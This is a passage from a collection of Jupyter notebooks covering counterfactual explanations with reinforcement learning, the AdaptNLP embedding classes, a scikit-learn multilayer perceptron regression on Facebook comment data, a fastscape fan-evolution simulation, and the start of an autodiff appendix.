acc = accuracy_score(y_true=Y_test, y_pred=predictor(X_test).argmax(axis=1))
print("Accuracy: %.3f" % acc)
```
### Define and train autoencoder
Instead of directly modelling the perturbation vector in the potentially high-dimensional input space, we first train an autoencoder. The weights of the encoder are frozen and the actor applies the
counterfactual perturbations in the latent space of the encoder. The pre-trained decoder maps the counterfactual embedding back to the input feature space.
The autoencoder follows a standard design. The model is composed from two submodules, the encoder and the decoder. The forward pass consists of passing the input to the encoder, obtain the input embedding and pass the embedding through the decoder.
```python
class HeAE(keras.Model):
def __init__(self, encoder: keras.Model, decoder: keras.Model, **kwargs) -> None:
super().__init__(**kwargs)
self.encoder = encoder
self.decoder = decoder
def call(self, x: tf.Tensor, **kwargs):
z = self.encoder(x)
x_hat = self.decoder(z)
return x_hat
```
The heterogeneous variant used in this example uses an additional type checking to ensure that the output of the decoder is a list of tensors.
Heterogeneous dataset require special treatment. In this work we modeled the numerical features by normal distributions with constant standard deviation and categorical features by categorical distributions. Due to the choice of feature modeling, some numerical features can end up having different types than the original numerical features. For example, a feature like `Age` having the type of `int` can become a `float` due to the autoencoder reconstruction (e.g., `Age=26 -> Age=26.3`). This behavior can be undesirable. Thus we performed casting when process the output of the autoencoder (decoder component).
```
# Define attribute types, required for datatype conversion.
feature_types = {"Age": int, "Capital Gain": int, "Capital Loss": int, "Hours per week": int}
# Define data preprocessor and inverse preprocessor. The invers preprocessor include datatype conversions.
heae_preprocessor, heae_inv_preprocessor = get_he_preprocessor(X=X_train,
feature_names=adult.feature_names,
category_map=adult.category_map,
feature_types=feature_types)
# Define trainset
trainset_input = heae_preprocessor(X_train).astype(np.float32)
trainset_outputs = {
"output_1": X_train_ohe[:, :len(numerical_ids)]
}
for i, cat_id in enumerate(categorical_ids):
trainset_outputs.update({
f"output_{i+2}": X_train[:, cat_id]
})
trainset = tf.data.Dataset.from_tensor_slices((trainset_input, trainset_outputs))
trainset = trainset.shuffle(1024).batch(128, drop_remainder=True)
# Define autoencoder path and create dir if it doesn't exist.
heae_path = os.path.join("tensorflow", "ADULT_autoencoder")
if not os.path.exists(heae_path):
os.makedirs(heae_path)
# Define constants.
EPOCHS = 50 # epochs to train the autoencoder
HIDDEN_DIM = 128 # hidden dimension of the autoencoder
LATENT_DIM = 15 # define latent dimension
# Define output dimensions.
OUTPUT_DIMS = [len(numerical_ids)]
OUTPUT_DIMS += [len(adult.category_map[cat_id]) for cat_id in categorical_ids]
# Define the heterogeneous auto-encoder.
heae = HeAE(encoder=ADULTEncoder(hidden_dim=HIDDEN_DIM, latent_dim=LATENT_DIM),
decoder=ADULTDecoder(hidden_dim=HIDDEN_DIM, output_dims=OUTPUT_DIMS))
# Define loss functions.
he_loss = [keras.losses.MeanSquaredError()]
he_loss_weights = [1.]
# Add categorical losses.
for i in range(len(categorical_names)):
he_loss.append(keras.losses.SparseCategoricalCrossentropy(from_logits=True))
he_loss_weights.append(1./len(categorical_names))
# Define metrics.
metrics = {}
for i, cat_name in enumerate(categorical_names):
metrics.update({f"output_{i+2}": keras.metrics.SparseCategoricalAccuracy()})
# Compile model.
heae.compile(optimizer=keras.optimizers.Adam(learning_rate=1e-3),
loss=he_loss,
loss_weights=he_loss_weights,
metrics=metrics)
if len(os.listdir(heae_path)) == 0:
# Fit and save autoencoder.
heae.fit(trainset, epochs=EPOCHS)
heae.save(heae_path, save_format="tf")
else:
# Load the model.
heae = keras.models.load_model(heae_path, compile=False)
```
### Counterfactual with Reinforcement Learning
```
# Define constants
COEFF_SPARSITY = 0.5 # sparisty coefficient
COEFF_CONSISTENCY = 0.5 # consisteny coefficient
TRAIN_STEPS = 10000 # number of training steps -> consider increasing the number of steps
BATCH_SIZE = 100 # batch size
```
#### Define dataset specific attributes and constraints
A desirable property of a method for generating counterfactuals is to allow feature conditioning. Real-world datasets usually include immutable features such as `Sex` or `Race`, which should remain unchanged throughout the counterfactual search procedure. Similarly, a numerical feature such as `Age` should only increase for a counterfactual to be actionable.
```
# Define immutable features.
immutable_features = ['Marital Status', 'Relationship', 'Race', 'Sex']
# Define ranges. This means that the `Age` feature can not decrease.
ranges = {'Age': [0.0, 1.0]}
```
#### Define and fit the explainer
```
explainer = CounterfactualRLTabular(predictor=predictor,
encoder=heae.encoder,
decoder=heae.decoder,
latent_dim=LATENT_DIM,
encoder_preprocessor=heae_preprocessor,
decoder_inv_preprocessor=heae_inv_preprocessor,
coeff_sparsity=COEFF_SPARSITY,
coeff_consistency=COEFF_CONSISTENCY,
category_map=adult.category_map,
feature_names=adult.feature_names,
ranges=ranges,
immutable_features=immutable_features,
train_steps=TRAIN_STEPS,
batch_size=BATCH_SIZE,
backend="tensorflow")
# Fit the explainer.
explainer = explainer.fit(X=X_train)
```
#### Test explainer
```
# Select some positive examples.
X_positive = X_test[np.argmax(predictor(X_test), axis=1) == 1]
X = X_positive[:1000]
Y_t = np.array([0])
C = [{"Age": [0, 20], "Workclass": ["State-gov", "?", "Local-gov"]}]
# Generate counterfactual instances.
explanation = explainer.explain(X, Y_t, C)
# Concat labels to the original instances.
orig = np.concatenate(
[explanation.data['orig']['X'], explanation.data['orig']['class']],
axis=1
)
# Concat labels to the counterfactual instances.
cf = np.concatenate(
[explanation.data['cf']['X'], explanation.data['cf']['class']],
axis=1
)
# Define new feature names and category map by including the label.
feature_names = adult.feature_names + ["Label"]
category_map = deepcopy(adult.category_map)
category_map.update({feature_names.index("Label"): adult.target_names})
# Replace label encodings with strings.
orig_pd = pd.DataFrame(
apply_category_mapping(orig, category_map),
columns=feature_names
)
cf_pd = pd.DataFrame(
apply_category_mapping(cf, category_map),
columns=feature_names
)
orig_pd.head(n=10)
cf_pd.head(n=10)
```
#### Diversity
```
# Generate counterfactual instances.
X = X_positive[1].reshape(1, -1)
explanation = explainer.explain(X=X, Y_t=Y_t, C=C, diversity=True, num_samples=100, batch_size=10)
# Concat label column.
orig = np.concatenate(
[explanation.data['orig']['X'], explanation.data['orig']['class']],
axis=1
)
cf = np.concatenate(
[explanation.data['cf']['X'], explanation.data['cf']['class']],
axis=1
)
# Transfrom label encodings to string.
orig_pd = pd.DataFrame(
apply_category_mapping(orig, category_map),
columns=feature_names,
)
cf_pd = pd.DataFrame(
apply_category_mapping(cf, category_map),
columns=feature_names,
)
orig_pd.head(n=5)
cf_pd.head(n=5)
```
### Logging
Logging is clearly important when dealing with deep learning models. Thus, we provide an interface to write custom callbacks for logging purposes after each training step which we defined [here](../api/alibi.explainers.cfrl_base.rst#alibi.explainers.cfrl_base.Callback). In the following cells we provide some example to log in **Weights and Biases**.
#### Logging reward callback
```
class RewardCallback(Callback):
def __call__(self,
step: int,
update: int,
model: CounterfactualRL,
sample: Dict[str, np.ndarray],
losses: Dict[str, float]):
if (step + update) % 100 != 0:
return
# get the counterfactual and target
Y_t = sample["Y_t"]
X_cf = model.params["decoder_inv_preprocessor"](sample["X_cf"])
# get prediction label
Y_m_cf = predictor(X_cf)
# compute reward
reward = np.mean(model.params["reward_func"](Y_m_cf, Y_t))
wandb.log({"reward": reward})
```
#### Logging losses callback
```
class LossCallback(Callback):
def __call__(self,
step: int,
update: int,
model: CounterfactualRL,
sample: Dict[str, np.ndarray],
losses: Dict[str, float]):
# Log training losses.
if (step + update) % 100 == 0:
wandb.log(losses)
```
#### Logging tables callback
```
class TablesCallback(Callback):
def __call__(self,
step: int,
update: int,
model: CounterfactualRL,
sample: Dict[str, np.ndarray],
losses: Dict[str, float]):
# Log every 1000 steps
if step % 1000 != 0:
return
# Define number of samples to be displayed.
NUM_SAMPLES = 5
X = heae_inv_preprocessor(sample["X"][:NUM_SAMPLES]) # input instance
X_cf = heae_inv_preprocessor(sample["X_cf"][:NUM_SAMPLES]) # counterfactual
Y_m = np.argmax(sample["Y_m"][:NUM_SAMPLES], axis=1).astype(int).reshape(-1, 1) # input labels
Y_t = np.argmax(sample["Y_t"][:NUM_SAMPLES], axis=1).astype(int).reshape(-1, 1) # target labels
Y_m_cf = np.argmax(predictor(X_cf), axis=1).astype(int).reshape(-1, 1) # counterfactual labels
# Define feature names and category map for input.
feature_names = adult.feature_names + ["Label"]
category_map = deepcopy(adult.category_map)
category_map.update({feature_names.index("Label"): adult.target_names})
# Construct input array.
inputs = np.concatenate([X, Y_m], axis=1)
inputs = pd.DataFrame(apply_category_mapping(inputs, category_map),
columns=feature_names)
# Define feature names and category map for counterfactual output.
feature_names += ["Target"]
category_map.update({feature_names.index("Target"): adult.target_names})
# Construct output array.
outputs = np.concatenate([X_cf, Y_m_cf, Y_t], axis=1)
outputs = pd.DataFrame(apply_category_mapping(outputs, category_map),
columns=feature_names)
# Log table.
wandb.log({
"Input": wandb.Table(dataframe=inputs),
"Output": wandb.Table(dataframe=outputs)
})
```
Having defined the callbacks, we can define a new explainer that will include logging.
```python
import wandb
# Initialize wandb.
wandb_project = "Adult Census Counterfactual with Reinforcement Learning"
wandb.init(project=wandb_project)
# Define explainer as before and include callbacks.
explainer = CounterfactualRLTabular(...,
callbacks=[LossCallback(), RewardCallback(), TablesCallback()])
# Fit the explainers.
explainer = explainer.fit(X=X_train)
# Close wandb.
wandb.finish()
```
| github_jupyter |
```
# default_exp inference.embeddings
```
# Embeddings
> AdaptNLP Embeddings Module
```
#hide
from nbverbose.showdoc import *
from fastcore.test import test_eq
from fastcore.xtras import is_listy
#export
import logging, torch
from typing import List, Dict, Union
from fastcore.basics import listify
from collections import defaultdict, OrderedDict
from fastcore.basics import mk_class
from fastcore.xtras import dict2obj
from fastcore.dispatch import typedispatch
from flair.data import Sentence
from flair.embeddings import (
Embeddings,
WordEmbeddings,
StackedEmbeddings,
FlairEmbeddings,
DocumentPoolEmbeddings,
DocumentRNNEmbeddings,
TransformerWordEmbeddings,
)
from adaptnlp.model_hub import FlairModelResult, HFModelResult, HFModelHub, FlairModelHub
from adaptnlp.result import SentenceResult, DetailLevel
#export
_flair_hub = FlairModelHub()
_hf_hub = HFModelHub()
#export
logger = logging.getLogger(__name__)
#exporti
@typedispatch
def _make_sentences(text:str, as_list=False) -> Union[List[Sentence], Sentence]:
return [Sentence(text)] if as_list else Sentence(text)
#hide
test_sentences = 'a,b,c'.split(',')
out = [_make_sentences(o) for o in test_sentences]
tst_out = [Sentence('a'), Sentence('b'), Sentence('c')]
for o,t in zip(out, tst_out):
test_eq(o[0].text, t[0].text)
#exporti
@typedispatch
def _make_sentences(text:list, as_list=False) -> Union[List[Sentence], Sentence]:
if all(isinstance(t,str) for t in text):
return [Sentence(t) for t in text]
elif all(isinstance(t, Sentence) for t in text):
return text
#hide
test_sentence = 'My name is Zach'
out = _make_sentences(test_sentence, as_list=True)
tst_out = [Sentence(test_sentence)]
for o,t in zip(out, tst_out):
test_eq(o[0].text, t[0].text)
test_eq(is_listy(out), True)
#exporti
@typedispatch
def _make_sentences(text:Sentence, as_list=False) -> Union[List[Sentence], Sentence]:
return [text] if as_list else text
#hide
test_sentence = Sentence('Me')
out = _make_sentences(test_sentence)
test_eq(test_sentence[0].text, out[0].text)
#exporti
@typedispatch
def _get_embedding_model(model_name_or_path:HFModelResult) -> TransformerWordEmbeddings:
return TransformerWordEmbeddings(model_name_or_path.name)
#exporti
@typedispatch
def _get_embedding_model(model_name_or_path:FlairModelResult) -> Union[FlairEmbeddings, WordEmbeddings]:
nm = model_name_or_path.name
try:
return WordEmbeddings(nm.strip('flairNLP/'))
except:
return FlairEmbeddings(nm.strip('flairNLP/'))
#exporti
@typedispatch
def _get_embedding_model(model_name_or_path:str) -> Union[TransformerWordEmbeddings, WordEmbeddings, FlairEmbeddings]:
res = _flair_hub.search_model_by_name(model_name_or_path, user_uploaded=True)
if len(res) < 1:
# No models found
res = _hf_hub.search_model_by_name(model_name_or_path, user_uploaded=True)
if len(res) < 1:
raise ValueError(f'Embeddings not found for the model key: {model_name_or_path}, check documentation or custom model path to verify specified model')
else:
return TransformerWordEmbeddings(res[0].name) # Returning the first should always be the non-fast option
else:
nm = res[0].name
try:
return WordEmbeddings(nm.strip('flairNLP/'))
except:
return FlairEmbeddings(nm.strip('flairNLP/'))
#export
class EmbeddingResult(SentenceResult):
"A result class designed for Embedding models"
def __init__(
self,
sentences:List[Sentence] # A list of Flair `Sentence`s
): super().__init__(sentences)
@property
def sentence_embeddings(self) -> OrderedDict:
"All embeddings in `sentences` (if available)"
e = OrderedDict()
for i,s in enumerate(self._sentences):
e.update({i:s.get_embedding()})
return e
@property
def token_embeddings(self) -> OrderedDict:
"All embeddings from the individual tokens in `sentence` with original order in shape (n, embed_dim)"
res = []
for s in self._sentences:
e = OrderedDict()
for i, tok in enumerate(s):
e.update({
i: tok.get_embedding()})
res.append(e)
return e
def to_dict(
self,
detail_level:DetailLevel=DetailLevel.Low # A level of detail to return
):
"Returns `self` as a dictionary"
o = OrderedDict()
o.update({'inputs':self.inputs,
'sentence_embeddings':self.sentence_embeddings,
'token_embeddings':self.token_embeddings})
if detail_level == "low": return o
if detail_level == 'medium' or detail_level == 'high':
# Return embeddings/word pairs and indicies, and the tokenized input
for s in self._sentences:
o.update({
tok.text:{
'embeddings':tok.get_embedding(),
'word_idx':tok.idx
} for tok in s
})
o.update({
'tokenized_inputs':self.tokenized_inputs
})
if detail_level == 'high':
# Return embeddings/word pairs, indicies, and the original Sentences objects
for s in self._sentences:
o.update({tok.text:{
'embeddings':tok.get_embedding(),
'word_idx':tok.idx
} for tok in s})
o.update({'sentences':self._sentences})
return o
def __repr__(self):
s = f"{self.__class__.__name__}:" + " {"
s += f'\n\tInputs: {self.inputs}'
if self.token_embeddings is not None: s += f'\n\tToken Embeddings Shapes: {[self.token_embeddings[i].shape for i in range(len(self.token_embeddings))]}'
if self.sentence_embeddings is not None: s += f'\n\tSentence Embeddings Shapes: {[self.sentence_embeddings[i].shape for i in range(len(self.sentence_embeddings))]}'
return s + '\n}'
show_doc(EmbeddingResult.sentence_embeddings)
show_doc(EmbeddingResult.token_embeddings)
show_doc(EmbeddingResult.to_dict)
#export
class EasyWordEmbeddings:
"""Word embeddings from the latest language models
Usage:
```python
>>> embeddings = adaptnlp.EasyWordEmbeddings()
>>> embeddings.embed_text("text you want embeddings for", model_name_or_path="bert-base-cased")
```
"""
def __init__(self):
self.models: Dict[Embeddings] = defaultdict(bool)
def embed_text(
self,
text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
model_name_or_path: Union[str, HFModelResult, FlairModelResult] = "bert-base-cased", # The hosted model name key, model path, or an instance of either `HFModelResult` or `FlairModelResult`
detail_level:DetailLevel = DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
raw:bool=False # Whether to return the raw outputs
) -> List[EmbeddingResult]: # A list of either `EmbeddingResult`s or dictionaries with information
"Produces embeddings for text"
# Convert into sentences
sentences = _make_sentences(text)
# Load correct Embeddings module
if model_name_or_path not in self.models.keys():
self.models[model_name_or_path] = _get_embedding_model(model_name_or_path)
embedding = self.models[model_name_or_path]
embeds = embedding.embed(sentences)
if not raw:
res = EmbeddingResult(listify(embeds))
return res.to_dict(detail_level) if detail_level is not None else res
else:
return listify(embeds)
def embed_all(
self,
text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
model_names_or_paths:List[str] = [], # A list of model names
detail_level:DetailLevel=DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
) -> List[EmbeddingResult]: # A list of either `EmbeddingResult`s or dictionaries with information
"Embeds text with all embedding models loaded"
# Convert into sentences
sentences = _make_sentences(text)
if model_names_or_paths:
for embedding_name in model_names_or_paths:
sentences = self.embed_text(
sentences, model_name_or_path=embedding_name, raw=True
)
else:
for embedding_name in self.models.keys():
sentences = self.embed_text(
sentences, model_name_or_path=embedding_name, raw=True
)
res = EmbeddingResult(listify(sentences))
return res.to_dict(detail_level) if detail_level is not None else res
#hide
import torch
embeddings = EasyWordEmbeddings()
res = embeddings.embed_text("text you want embeddings for", model_name_or_path="bert-base-cased")
test_eq(res['token_embeddings'][0].shape, torch.Size([768]))
show_doc(EasyWordEmbeddings.embed_text)
#hide
res = embeddings.embed_all(['text you want embeddings for', 'My name is Zach'],
['bert-base-cased', 'xlnet-base-cased'])
test_eq(res['token_embeddings'][0].shape, torch.Size([1536]))
show_doc(EasyWordEmbeddings.embed_all)
#export
class EasyStackedEmbeddings:
"Word Embeddings that have been concatenated and 'stacked' as specified by Flair"
def __init__(
self,
*embeddings: str
):
print("May need a couple moments to instantiate...")
self.embedding_stack = []
# Load correct Embeddings module
for model_name_or_path in embeddings:
self.embedding_stack.append(_get_embedding_model(model_name_or_path))
assert len(self.embedding_stack) != 0
self.stacked_embeddings = StackedEmbeddings(embeddings=self.embedding_stack)
def embed_text(
self,
text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
detail_level:DetailLevel = DetailLevel.Low # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
) -> List[EmbeddingResult]: # A list of either EmbeddingResult's or dictionaries with information
"Stacked embeddings"
# Convert into sentences
sentences = _make_sentences(text, as_list=True)
# Unlike flair embeddings modules, stacked embeddings do not return a list of sentences
self.stacked_embeddings.embed(sentences)
res = EmbeddingResult(listify(sentences))
return res.to_dict(detail_level) if detail_level is not None else res
#hide
embeddings = EasyStackedEmbeddings("bert-base-cased", "xlnet-base-cased")
sentences = embeddings.embed_text("This is Albert. My last name is Einstein. I like physics and atoms.")
test_eq(sentences['token_embeddings'][0].shape, torch.Size([1536]))
show_doc(EasyStackedEmbeddings.embed_text)
#export
class EasyDocumentEmbeddings:
"Document Embeddings generated by pool and rnn methods applied to the word embeddings of text"
__allowed_methods = ["rnn", "pool"]
__allowed_configs = ("pool_configs", "rnn_configs")
def __init__(
self,
*embeddings: str, # Variable number of strings referring to model names or paths
methods: List[str] = ["rnn", "pool"], # A list of strings to specify which document embeddings to use i.e. ["rnn", "pool"] (avoids unncessary loading of models if only using one)
configs: Dict = {
"pool_configs": {"fine_tune_mode": "linear", "pooling": "mean"},
"rnn_configs": {
"hidden_size": 512,
"rnn_layers": 1,
"reproject_words": True,
"reproject_words_dimension": 256,
"bidirectional": False,
"dropout": 0.5,
"word_dropout": 0.0,
"locked_dropout": 0.0,
"rnn_type": "GRU",
"fine_tune": True,
},
}, # A dictionary of configurations for flair's rnn and pool document embeddings
):
print("May need a couple moments to instantiate...")
self.embedding_stack = []
# Check methods
for m in methods:
assert m in self.__class__.__allowed_methods
# Set configs for pooling and rnn parameters
for k, v in configs.items():
assert k in self.__class__.__allowed_configs
setattr(self, k, v)
# Load correct Embeddings module
for model_name_or_path in embeddings:
self.embedding_stack.append(_get_embedding_model(model_name_or_path))
assert len(self.embedding_stack) != 0
if "pool" in methods:
self.pool_embeddings = DocumentPoolEmbeddings(
self.embedding_stack, **self.pool_configs
)
print("Pooled embedding loaded")
if "rnn" in methods:
self.rnn_embeddings = DocumentRNNEmbeddings(
self.embedding_stack, **self.rnn_configs
)
print("RNN embeddings loaded")
def embed_pool(
self,
text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
detail_level:DetailLevel = DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
) -> List[EmbeddingResult]: # A list of either EmbeddingResult's or dictionaries with information
"Generate stacked embeddings with `DocumentPoolEmbeddings`"
sentences = _make_sentences(text, as_list=True)
self.pool_embeddings.embed(sentences)
res = EmbeddingResult(listify(sentences))
return res.to_dict(detail_level) if detail_level is not None else res
def embed_rnn(
self,
text: Union[List[Sentence], Sentence, List[str], str], # Text input, it can be a string or any of Flair's `Sentence` input formats
detail_level:DetailLevel = DetailLevel.Low, # A level of detail to return. By default is None, which returns a EmbeddingResult, otherwise will return a dict
) -> List[Sentence]: # A list of either EmbeddingResult's or dictionaries with information
"Generate stacked embeddings with `DocumentRNNEmbeddings`"
sentences = _make_sentences(text, as_list=True)
self.rnn_embeddings.embed(sentences)
res = EmbeddingResult(listify(sentences))
return res.to_dict(detail_level) if detail_level is not None else res
#hide
embeddings = EasyDocumentEmbeddings("bert-base-cased", "xlnet-base-cased")
res = embeddings.embed_pool("This is Albert. My last name is Einstein. I like physics and atoms.")
test_eq(res['sentence_embeddings'][0].shape, torch.Size([1536]))
#hide
res = embeddings.embed_rnn("This is Albert. My last name is Einstein. I like physics and atoms.")
test_eq(res['sentence_embeddings'][0].shape, torch.Size([512]))
show_doc(EasyDocumentEmbeddings.embed_pool)
show_doc(EasyDocumentEmbeddings.embed_rnn)
```
| github_jupyter |
# Multilayer Perceptrons with scikit-learn
**XBUS-512: Introduction to AI and Deep Learning**
In this exercise, we will see how to build a preliminary neural model using the familiar scikit-learn library. While scikit-learn is not a deep learning library, it does provide basic implementations of the multilayer perceptron (MLP) for both classification and regression.
Thanks to [this team](https://github.com/Wall-eSociety/CommentVolumeML) for figuring out the labels for this dataset!
## Imports
```
import os
import time
import pickle
import zipfile
import requests
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split as tts
from sklearn.neural_network import MLPClassifier, MLPRegressor
from yellowbrick.regressor import PredictionError, ResidualsPlot
```
## Download the data
```
def fetch_data(url, fname):
"""
Helper method to retreive the data from the UCI ML Repository.
"""
response = requests.get(url)
outpath = os.path.abspath(fname)
with open(outpath, "wb") as f:
f.write(response.content)
return outpath
# Fetch and unzip the data
FIXTURES = os.path.join("..", "fixtures")
if not os.path.exists(FIXTURES):
os.makedirs(FIXTURES)
URL = "https://archive.ics.uci.edu/ml/machine-learning-databases/00363/Dataset.zip"
ZIPPED_FILES = "facebook_data.zip"
UNZIPPED_FILES = "facebook_data"
zipped_data = fetch_data(URL, os.path.join(FIXTURES, ZIPPED_FILES))
with zipfile.ZipFile(os.path.join(FIXTURES, ZIPPED_FILES), "r") as zfiles:
zfiles.extractall(os.path.join(FIXTURES, UNZIPPED_FILES))
data = pd.read_csv(
os.path.join(
FIXTURES,
UNZIPPED_FILES,
"Dataset",
"Training",
"Features_Variant_2.csv"
),
header=None
)
data.columns = [
"likes", "views", "returns", "category", "derived_1", "derived_2", "derived_3",
"derived_4", "derived_5", "derived_6", "derived_7", "derived_8", "derived_9",
"derived_10", "derived_11", "derived_12", "derived_13", "derived_14", "derived_15",
"derived_16", "derived_17", "derived_18", "derived_19", "derived_20", "derived_21",
"derived_22", "derived_23", "derived_24", "derived_25", "cc_1", "cc_2", "cc_3",
"cc_4", "cc_5", "base_time", "length", "shares", "status", "h_local", "sunday_post",
"monday_post", "tuesday_post", "wednesday_post", "thursday_post", "friday_post",
"saturday_post", "sunday_base", "monday_base", "tuesday_base", "wednesday_base",
"thursday_base", "friday_base", "saturday_base", "target"
]
data.describe()
def prepare_for_regression(dataframe):
"""
Prepare the data for a regression problem where we will attempt
to regress the number of comments that a Facebook post will get
given other features of the data.
Returns a tuple containing an nd array of features (X)
and a 1d array for the target (y)
"""
features = [
"likes", "views", "returns", "category", "derived_1", "derived_2", "derived_3",
"derived_4", "derived_5", "derived_6", "derived_7", "derived_8", "derived_9",
"derived_10", "derived_11", "derived_12", "derived_13", "derived_14", "derived_15",
"derived_16", "derived_17", "derived_18", "derived_19", "derived_20", "derived_21",
"derived_22", "derived_23", "derived_24", "derived_25", "cc_1", "cc_2", "cc_3",
"cc_4", "cc_5", "base_time", "length", "shares", "status", "h_local", "sunday_post",
"monday_post", "tuesday_post", "wednesday_post", "thursday_post", "friday_post",
"saturday_post", "sunday_base", "monday_base", "tuesday_base", "wednesday_base",
"thursday_base", "friday_base", "saturday_base"
]
target = "target"
# MLP is sensitive to feature scaling!
X = MinMaxScaler().fit_transform(dataframe[features].values)
y = dataframe[target].values
return X, y
def prepare_for_classification(dataframe):
"""
Prepare the data for a classification problem where we will attempt
to predict the category of a Facebook post given features of the data.
Returns a tuple containing an nd array of features (X)
and a 1d array for the target (y)
"""
features = [
"likes", "views", "returns", "derived_1", "derived_2", "derived_3",
"derived_4", "derived_5", "derived_6", "derived_7", "derived_8", "derived_9",
"derived_10", "derived_11", "derived_12", "derived_13", "derived_14", "derived_15",
"derived_16", "derived_17", "derived_18", "derived_19", "derived_20", "derived_21",
"derived_22", "derived_23", "derived_24", "derived_25", "cc_1", "cc_2", "cc_3",
"cc_4", "cc_5", "base_time", "length", "shares", "status", "h_local", "sunday_post",
"monday_post", "tuesday_post", "wednesday_post", "thursday_post", "friday_post",
"saturday_post", "sunday_base", "monday_base", "tuesday_base", "wednesday_base",
"thursday_base", "friday_base", "saturday_base", "target"
]
target = "category"
# MLP is sensitive to feature scaling!
X = MinMaxScaler().fit_transform(dataframe[features].values)
y = dataframe[target].values
return X, y
# Prepare the data and break in to training and test splits
X, y = prepare_for_regression(data)
X_train, X_test, y_train, y_test = tts(X, y, test_size=0.2, random_state=42)
```
## Instantiate the model, set hyperparameters, and train
```
start = time.time()
model = MLPRegressor(
hidden_layer_sizes=(100, 50, 25),
activation="relu",
solver="adam",
batch_size=2,
max_iter=100,
verbose=True
)
model.fit(X_train, y_train)
print("Training took {} seconds".format(
time.time() - start
))
pred_train = model.predict(X_train)
print("Training error: {}".format(
np.sqrt(mean_squared_error(y_train, pred_train))
))
pred = model.predict(X_test)
print("Test error: {}".format(
np.sqrt(mean_squared_error(y_test, pred))
))
```
## Visualize the results using Yellowbrick
```
visualizer = PredictionError(model)
visualizer.fit(X_train, y_train)
visualizer.score(X_test, y_test)
visualizer.show()
visualizer = ResidualsPlot(model)
visualizer.fit(X_train, y_train)
visualizer.score(X_test, y_test)
visualizer.show()
```
## Pickle the model
```
RESULTS = os.path.join("..", "results")
if not os.path.exists(RESULTS):
os.makedirs(RESULTS)
filename = os.path.join(RESULTS, "sklearn_model.pkl")
pickle.dump(model, open(filename, "wb"))
```
## Restore the model and run live predictions
```
unpickled_model = pickle.load(open(filename, "rb"))
new_prediction = unpickled_model.predict(X_test[10].reshape(1, -1))
print("Predicted value: ", new_prediction[0])
print("Actual value: ", y_test[10])
```
## Takeaways from our scikit-learn prototype:
- sklearn API is convenient
- can tune some hyperparams
- easy to visualize & diagnose with Yellowbrick
- tough to tune for overfit model... would be nice to have dropout, for instance
- sloooooow
| github_jupyter |
# Evolution of a fan
This notebook reproduces the [fan example](https://fastscape-lem.github.io/fastscapelib-fortran/#_fan_f90) provided in the fastscapelib-fortran library. It illustrates continental transport/deposition.
```
import numpy as np
import xsimlab as xs
import matplotlib.pyplot as plt
import fastscape
%matplotlib inline
print('xarray-simlab version: ', xs.__version__)
print('fastscape version: ', fastscape.__version__)
```
## Import, customize and inspect the model
A sediment model is available in [fastscape](https://fastscape.readthedocs.io/en/latest/).
```
from fastscape.models import sediment_model
```
We want to model the evolution of a passive escarpment, thus with no uplift.
```
from fastscape.processes import Escarpment
model = (sediment_model
.drop_processes('uplift')
.update_processes({'init_topography': Escarpment}))
model
model.visualize(show_inputs=True)
```
## Model setup
```
in_ds = xs.create_setup(
model=model,
clocks={
'time': np.arange(0, 4e5 + 2e3, 2e3),
'out': np.arange(0, 4e5 + 4e3, 4e3),
},
master_clock='time',
input_vars={
'grid__shape': [101, 201],
'grid__length': [1e4, 2e4],
'boundary__status': ['fixed_value', 'core', 'looped', 'looped'],
'init_topography': {
'x_left': 1e4,
'x_right': 1e4,
'elevation_left': 0.,
'elevation_right': 1e3
},
'flow__slope_exp': 1.,
'spl': {
'k_coef_bedrock': 1e-4,
'k_coef_soil': 1.5e-4,
'g_coef_bedrock': 1.,
'g_coef_soil': 1.,
'area_exp': 0.4,
'slope_exp': 1.
},
'diffusion': {
'diffusivity_bedrock': 1e-2,
'diffusivity_soil': 1.5e-2
}
},
output_vars={
'topography__elevation': 'out',
'erosion__rate': 'out'
}
)
in_ds
```
## Run the model
```
with xs.monitoring.ProgressBar():
out_ds = in_ds.xsimlab.run(model=model)
out_ds
```
## Plot the outputs
The following plots (total erosion/deposition rate, drainage area and topography cross-section) highlight the dynamics on the left area (depositional) and its interaction with the right area (erosional).
```
import hvplot.xarray
import holoviews as hv
from xshade import hillshade
erosion_plot = out_ds.erosion__rate.hvplot.image(
x='x', y='y', clim=(-2.5e-3, 2.5e-3),
cmap=plt.cm.RdYlGn_r, groupby='out'
)
hillshade_plot = hillshade(out_ds, 'out').hvplot.image(
x='x', y='y', cmap=plt.cm.gray, alpha=0.4,
colorbar=False, hover=False, groupby='out'
)
ysections = out_ds.topography__elevation.sel(y=[2.5e3, 5e3, 7.5e3])
sections_plot = ysections.hvplot.line(
by='y', groupby='out', ylim=(0, 1100),
height=200, legend='top_left',
)
hv.Layout((erosion_plot * hillshade_plot) + sections_plot).cols(1)
```
| github_jupyter |
**Appendix D – Autodiff**
_This notebook contains toy implementations of various autodiff techniques, to explain how they works._
# Setup
# Introduction
Suppose we want to compute the gradients of the function $f(x,y)=x^2y + y + 2$ with regards to the parameters x and y:
```
def f(x,y):
return x*x*y + y + 2
```
One approach is to solve this analytically:
$\dfrac{\partial f}{\partial x} = 2xy$
$\dfrac{\partial f}{\partial y} = x^2 + 1$
```
def df(x,y):
return 2*x*y, x*x + 1
```
So for example $\dfrac{\partial f}{\partial x}(3,4) = 24$ and $\dfrac{\partial f}{\partial y}(3,4) = 10$.
```
df(3, 4)
```
Perfect! We can also find the equations for the second order derivatives (also called Hessians):
$\dfrac{\partial^2 f}{\partial x \partial x} = \dfrac{\partial (2xy)}{\partial x} = 2y$
$\dfrac{\partial^2 f}{\partial x \partial y} = \dfrac{\partial (2xy)}{\partial y} = 2x$
$\dfrac{\partial^2 f}{\partial y \partial x} = \dfrac{\partial (x^2 + 1)}{\partial x} = 2x$
